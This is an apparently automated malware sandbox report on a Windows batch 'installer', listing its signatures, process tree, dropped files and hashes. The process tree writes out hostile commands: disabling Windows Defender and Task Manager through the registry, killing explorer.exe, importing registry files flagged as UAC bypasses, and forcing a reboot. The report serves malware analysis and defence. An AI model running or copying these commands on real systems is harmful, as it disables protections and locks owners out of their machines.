Analysis

  • max time kernel
    118s
  • max time network
    124s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    02-03-2024 20:29

Errors

Reason
Machine shutdown

General

  • Target

    TheMalwaredev-s-garbage-main/Install Windows20/installer/main.bat

  • Size

    3KB

  • MD5

    5f54a2c61397eb3d4f1bc8e9736fec2a

  • SHA1

    5c3ad25b0bff96ad74d2743b15089847d6be2d40

  • SHA256

    9995fab89f303652abc14b153ea864d9a5e39e20c8077d165e9944948eeeb968

  • SHA512

    d7c84ac92cb35aca9fb4c2e7bb43924e5033ad49a9b4fcee320386a5d0bfddf2ec674e33a575c0848b9d274bebeb4dc9abca0360493c968bbc29c7a09438141f

Malware Config

Signatures

  • UAC bypass 3 TTPs 16 IoCs
  • Disables Task Manager via registry modification
  • UPX packed file 8 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Windows directory 15 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies registry class 19 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\main.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2000
    • C:\Windows\system32\taskkill.exe
      taskkill /f /im explorer.exe
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:1840
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\update.vbs"
      2⤵
        PID:2496
      • C:\Windows\system32\timeout.exe
        timeout 20
        2⤵
        • Delays execution with timeout.exe
        PID:2472
      • C:\Windows\system32\reg.exe
        reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Public\temp\noescape.bmp /f
        2⤵
        • Sets desktop wallpaper using registry
        PID:2248
      • C:\Windows\system32\rundll32.exe
        RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
        2⤵
          PID:2956
        • C:\Windows\system32\reg.exe
          Reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
          2⤵
            PID:2236
          • C:\Windows\system32\reg.exe
            reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoTrayItemsDisplay" /t REG_DWORD /d "1" /f
            2⤵
              PID:1804
            • C:\Windows\system32\reg.exe
              reg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1
              2⤵
              • Modifies registry key
              PID:2016
            • C:\Windows\system32\reg.exe
              reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoPinningToTaskbar" /t REG_DWORD /d "1" /f
              2⤵
                PID:1796
              • C:\Windows\system32\reg.exe
                reg import virus.reg
                2⤵
                  PID:2720
                • C:\Windows\system32\reg.exe
                  reg import here.reg
                  2⤵
                  • UAC bypass
                  PID:2780
                • C:\Windows\system32\reg.exe
                  reg import death.reg
                  2⤵
                    PID:2640
                  • C:\Windows\system32\reg.exe
                    reg import no.reg
                    2⤵
                    • UAC bypass
                    PID:2804
                  • C:\Windows\system32\reg.exe
                    reg import password.reg
                    2⤵
                      PID:2824
                    • C:\Windows\system32\reg.exe
                      reg import color.reg
                      2⤵
                        PID:2820
                      • C:\Windows\System32\WScript.exe
                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                        2⤵
                          PID:348
                        • C:\Windows\System32\WScript.exe
                          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                          2⤵
                            PID:1596
                          • C:\Windows\System32\WScript.exe
                            "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                            2⤵
                              PID:588
                            • C:\Windows\System32\WScript.exe
                              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                              2⤵
                                PID:2304
                              • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\mover.exe
                                mover.exe
                                2⤵
                                  PID:2880
                                • C:\Windows\System32\WScript.exe
                                  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                  2⤵
                                    PID:2172
                                  • C:\Windows\System32\WScript.exe
                                    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                    2⤵
                                      PID:2792
                                    • C:\Windows\System32\WScript.exe
                                      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                      2⤵
                                        PID:2076
                                      • C:\Windows\System32\WScript.exe
                                        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\op.vbs"
                                        2⤵
                                          PID:2800
                                        • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                          x.exe
                                          2⤵
                                          • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                          PID:2484
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6CD.tmp\x.cmd""
                                            3⤵
                                              PID:684
                                          • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                            x.exe
                                            2⤵
                                            • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                            PID:2488
                                            • C:\Windows\SysWOW64\cmd.exe
                                              cmd /c ""C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd""
                                              3⤵
                                                PID:2920
                                            • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                              x.exe
                                              2⤵
                                              • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                              PID:2628
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AE.tmp\x.cmd""
                                                3⤵
                                                  PID:1040
                                              • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                x.exe
                                                2⤵
                                                • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                PID:2572
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6AF.tmp\x.cmd""
                                                  3⤵
                                                    PID:704
                                                • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                  x.exe
                                                  2⤵
                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                  PID:2732
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    cmd /c ""C:\Users\Admin\AppData\Local\Temp\F69E.tmp\x.cmd""
                                                    3⤵
                                                      PID:1936
                                                  • C:\Users\Admin\AppData\Local\Temp\TheMalwaredev-s-garbage-main\Install Windows20\installer\x.exe
                                                    x.exe
                                                    2⤵
                                                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                    PID:2656
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c ""C:\Users\Admin\AppData\Local\Temp\F6B0.tmp\x.cmd""
                                                      3⤵
                                                        PID:1756
                                                    • C:\Windows\system32\reg.exe
                                                      reg import im.reg
                                                      2⤵
                                                        PID:3028
                                                      • C:\Windows\system32\reg.exe
                                                        reg import systemmessage.reg
                                                        2⤵
                                                        • UAC bypass
                                                        PID:1368
                                                      • C:\Windows\system32\reg.exe
                                                        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
                                                        2⤵
                                                        • Modifies registry key
                                                        PID:1944
                                                      • C:\Windows\system32\reg.exe
                                                        reg import UAC.reg
                                                        2⤵
                                                        • UAC bypass
                                                        PID:2008
                                                      • C:\Windows\system32\reg.exe
                                                        reg import inkfile.reg
                                                        2⤵
                                                        • Modifies registry class
                                                        PID:2024
                                                      • C:\Windows\system32\shutdown.exe
                                                        shutdown /r /t 0
                                                        2⤵
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:1796
                                                    • C:\Windows\system32\LogonUI.exe
                                                      "LogonUI.exe" /flags:0x0
                                                      1⤵
                                                        PID:2824
                                                      • C:\Windows\system32\LogonUI.exe
                                                        "LogonUI.exe" /flags:0x1
                                                        1⤵
                                                          PID:2296

                                                        Network

                                                        MITRE ATT&CK Enterprise v15

                                                        Replay Monitor

                                                        Loading Replay Monitor...

                                                        Downloads

                                                        • C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\note.txt

                                                          Filesize

                                                          385B

                                                          MD5

                                                          1ebb3ddb5424eae8205a111a3b4e2237

                                                          SHA1

                                                          7f6603ae0410ea2dc5adfd879632039b0eee955a

                                                          SHA256

                                                          efc4f3065ab66661a92daebbf770103b2e8306d3985ac5c5ae816e0f64e6ab4e

                                                          SHA512

                                                          cc9d3d208f97f8f9f46865ce75257cff6616e49f49b90e1273fa923c1d7c05c68e0ea35eec3361de4167839acec86e03c40cf4f1bf7bb039ec91cd4f8e3c855f

                                                        • C:\Users\Admin\AppData\Local\Temp\F68F.tmp\x.cmd

                                                          Filesize

                                                          76B

                                                          MD5

                                                          5156c0df260ccc7bc13b73b6de4d9a25

                                                          SHA1

                                                          e6f8b1f6ef658a1f5772b83c898088330184d291

                                                          SHA256

                                                          565850ac8c04867b561958ea678143b383499e729aebace9c84bec0484772b88

                                                          SHA512

                                                          d2e7d791e6ccbf6389659d4fa673bbbb837a8ccbdfec287ff6a5d8a385e9aad413d692bc5cf93cae4d8292f565a7e9ddcc437da97a9b5fdd0c4526c4ca69cc39

                                                        • C:\Users\Public\Desktop\Escape.vbs

                                                          Filesize

                                                          23B

                                                          MD5

                                                          23873c064655ec26585bb489cab1965c

                                                          SHA1

                                                          575d47d57ddb6ffb5335f5d48f6bd222e17af599

                                                          SHA256

                                                          828653c66fd126cb9f30a8fc566887d3ae54376ccba637101ae8e0889a6a3b63

                                                          SHA512

                                                          44517e1b3e6ba403d99e3ae6d9340ea3e856a50e4bec3740d3530d066f28677b78ea2a25ebf63df948469dde04547044483bb9d37a5cf79e8b3ea3544bfaf348

                                                        • C:\Users\Public\Desktop\Hacking2.vbs

                                                          Filesize

                                                          182B

                                                          MD5

                                                          81c5f570e4fb185d0d675c450741f28b

                                                          SHA1

                                                          cc7c042a8ec903ea5fd4171ffa2dfe57e8a5586a

                                                          SHA256

                                                          0c32196e293badc8b917f22ecf9d746c631678a15704dc829d594e1e04f01376

                                                          SHA512

                                                          2434226097e83942ddade8a98efaa2d912f8030180729fd6ccedbe70091d262a8d1ac080ae41a6c5ac37c4303c79bbdea8d6fa86828759651536532cb2fa5936

                                                        • C:\Users\Public\Desktop\setup3.exe

                                                          Filesize

                                                          22KB

                                                          MD5

                                                          9d0cbe0006b8e6760679bf893c5d848f

                                                          SHA1

                                                          a85c9378a962f1f3454ec34ce596dea318031618

                                                          SHA256

                                                          41bb8333a815138ccdc1809c33d3263d67834b2493c6b8eeebd5dde3d1ffe20c

                                                          SHA512

                                                          13f513d75235da33bb032901b506c718cece2f7f9d0fbe4bd9d3508f9efca208b10a319b130ec98327b6c5e054abcf7d052ce3e672f2c1c38bac1c162d4358e2

                                                        • C:\Users\Public\Music\FREE SOLARIS.vbs

                                                          Filesize

                                                          37B

                                                          MD5

                                                          ac910281f16a464b6257102b715ffafc

                                                          SHA1

                                                          590add7ed48a1d5fa78093812ef88f9d0dfbb7c5

                                                          SHA256

                                                          afb4e7e0f799d76ec4b197427b0933935eddd933baf6379875b3c37eb6b1bc6e

                                                          SHA512

                                                          a62b9363acf0628ec373a33409f13e161779f0d28b0dd163b53d4ec9135b172e68c10dfb37a5459e51ec636ff3e23cc17de4a846d273e5a3e9149abe41a806ad

                                                        • C:\WinKernel64.bat

                                                          Filesize

                                                          113B

                                                          MD5

                                                          284e7e79635ec15370bb7530d20f6b7e

                                                          SHA1

                                                          471f6b7bc91a8c6b51f291c75126a38b082a92ce

                                                          SHA256

                                                          4d81298082414e092ccb0dab56007df80a1930b60315a5b759bf1d10d8c11235

                                                          SHA512

                                                          3bcbce046df39bf285a2e63f83374fc0c6b809b4ee5091744496244b5929753f102402c87671205ae9b7caa78b12328cabfae1523fe6abbc5abd6e66cae57e24

                                                        • C:\Windows\updatepush.exe

                                                          Filesize

                                                          128KB

                                                          MD5

                                                          27d4d788b5190d8ad943f03479c86360

                                                          SHA1

                                                          5ca05ed08987ade8d20a9e1bd3d7245d9b3ef4e7

                                                          SHA256

                                                          2d3586f1ce37337292ac4b3ece03ab78b3aa5c28a5925d7d498d35ca32434993

                                                          SHA512

                                                          c55a8819dc3285d655c2033e98e47db6397654ad1aee6a22e8ac50d8b6cb11b8eb41a59a6aee5bce1a784167894f4664b0ad390110e94013a19d221a9cfba02e

                                                        • memory/2000-174-0x0000000140000000-0x0000000140126000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2296-345-0x0000000002BB0000-0x0000000002BB1000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2484-337-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2484-275-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2488-341-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2572-339-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2628-340-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2656-338-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2732-342-0x0000000000400000-0x0000000000410000-memory.dmp

                                                          Filesize

                                                          64KB

                                                        • memory/2824-343-0x0000000002D90000-0x0000000002D91000-memory.dmp

                                                          Filesize

                                                          4KB

                                                        • memory/2880-178-0x0000000140000000-0x0000000140126000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2880-344-0x0000000140000000-0x0000000140126000-memory.dmp

                                                          Filesize

                                                          1.1MB

                                                        • memory/2880-176-0x0000000140000000-0x0000000140126000-memory.dmp

                                                          Filesize

                                                          1.1MB